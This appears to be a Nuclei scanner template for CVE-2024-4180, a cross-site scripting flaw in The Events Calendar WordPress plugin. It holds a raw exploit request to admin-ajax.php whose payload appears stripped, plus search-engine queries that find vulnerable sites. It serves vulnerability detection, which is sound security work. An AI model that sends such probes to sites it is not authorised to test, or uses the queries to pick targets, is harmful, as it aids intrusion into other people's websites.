id: CVE-2024-4180 info: name: The Events Calendar < 6.4.0.1 - Cross-site Scripting author: 0x_Akoko severity: medium description: | The Events Calendar WordPress plugin < 6.4.0.1 contains a stored XSS caused by improper sanitization of user-submitted content when rendering views via AJAX, letting attackers execute scripts in the context of the affected site. Exploitation requires user interaction. impact: | Attackers can execute arbitrary scripts in the context of the affected site, leading to potential session hijacking or defacement. remediation: | Update to version 6.4.0.1 or later. reference: - https://wpscan.com/vulnerability/b2a92316-e404-4a5e-8426-f88df6e87550/ - https://wordpress.org/plugins/the-events-calendar/ - https://nvd.nist.gov/vuln/detail/CVE-2024-4180 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N cvss-score: 9.1 cve-id: CVE-2024-4180 cwe-id: CWE-79 epss-score: 0.01834 epss-percentile: 0.76722 cpe: cpe:2.3:a:stellarwp:the_events_calendar:*:*:*:*:*:wordpress:*:* metadata: verified: true max-request: 1 vendor: stellarwp product: the_events_calendar framework: wordpress fofa-query: body="wp-content/plugins/the-events-calendar/" publicwww-query: "/wp-content/plugins/the-events-calendar/" tags: cve,cve2024,wordpress,wp-plugin,wp,wpscan,the-events-calendar,xss http: - raw: - | POST /wp-admin/admin-ajax.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded action=tribe_events_views_v2_fallback&view=reflector&view_data[lala]='' matchers: - type: dsl dsl: - contains_all(body, '', 'event_display_mode') - contains(content_type, 'text/html') - status_code == 200 condition: and # digest: 4a0a00473045022011b500c4d813b89f13fa334067a35520a1bbfb8682ac5ce833d8bef3bda5f162022100b06dd342db623cde4abb29c0c93a6c15a7f549fe0ce0638ad3f508c933543a2a:922c64590222798bb761d5b6d8e72950